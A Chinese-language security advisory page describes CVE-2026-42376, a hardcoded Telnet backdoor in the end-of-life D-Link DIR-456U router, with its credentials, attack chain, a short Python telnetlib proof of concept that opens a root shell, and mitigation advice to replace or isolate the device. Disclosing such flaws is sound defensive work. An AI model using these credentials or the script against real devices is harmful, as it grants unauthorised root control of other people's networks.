IPBUF安全漏洞报告
English
CVE-2026-42376 CVSS 9.8 严重

CVE-2026-42376 D-Link DIR-456U 硬编码Telnet后门漏洞

披露日期: 2026-05-04
来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号
CVE-2026-42376
漏洞类型
后门
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-456U

相关标签

后门硬编码凭据远程代码执行IoTD-LinkTelnet

漏洞概述

D-Link DIR-456U (A1版本) 存在一个严重的硬编码Telnet后门漏洞。由于设备已停止支持(EOL),该漏洞无法获得官方修复。攻击者无需身份验证,只要接入本地网络,即可利用预设的硬编码凭据通过Telnet服务获取设备的Root权限,完全控制设备,造成严重的安全风险。

技术细节

该漏洞源于D-Link DIR-456U路由器固件中存在严重的后门机制。设备在启动过程中,通过 /etc/init0.d/S80telnetd.sh 脚本自动激活Telnet服务。该服务加载了硬编码的认证凭证:用户名为 "Alphanetworks",密码为静态字符串 "whdrv01_dlob_dir456U"。系统通过自定义的 telnetd 二进制文件处理连接,并使用自定义的 login 程序调用 strcmp() 函数来验证输入的用户名和密码是否与硬编码值匹配。由于该逻辑缺陷,任何能够访问设备局域网的攻击者,无需进行复杂的漏洞利用攻击,只需利用这一公开的后门账号进行Telnet连接,即可绕过正常的身份验证机制,直接获取设备的Root Shell权限。攻击者随后可以执行任意系统命令,修改配置,窃取数据或进一步渗透内网。由于设备已EOL,该风险将长期存在。

攻击链分析

STEP 1
信息收集
攻击者扫描本地网络,识别D-Link DIR-456U设备及其开放端口。
STEP 2
建立连接
攻击者利用Telnet客户端连接到目标设备的23端口。
STEP 3
身份验证绕过
攻击者使用硬编码的用户名(Alphanetworks)和密码(whdrv01_dlob_dir456U)进行登录。
STEP 4
获取权限
验证成功后,设备返回一个Root Shell,攻击者获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import telnetlib import sys # Target configuration HOST = "192.168.0.1" # Replace with the target IP address PORT = 23 USER = "Alphanetworks" PASS = "whdrv01_dlob_dir456U" def exploit(): try: print(f"[*] Attempting to connect to {HOST}:{PORT}...") # Initialize Telnet connection tn = telnetlib.Telnet(HOST, PORT, timeout=10) print("[*] Sending username...") tn.read_until(b"login: ", timeout=5) tn.write(USER.encode('ascii') + b"\n") print("[*] Sending password...") tn.read_until(b"Password: ", timeout=5) tn.write(PASS.encode('ascii') + b"\n") print("[*] Checking for shell access...") # If successful, we should have a root shell prompt tn.interact() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit()

影响范围

D-Link DIR-456U Hardware Revision A1

防御指南

临时缓解措施
由于D-Link DIR-456U已达到生命周期结束(EOL)且存在无法修复的硬编码后门,官方不会提供补丁。唯一的彻底缓解措施是立即更换受影响设备。如果暂时无法更换,请务必限制局域网内对该设备的访问,将其放置在独立的隔离网络中,并严格禁止外部网络访问其管理端口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表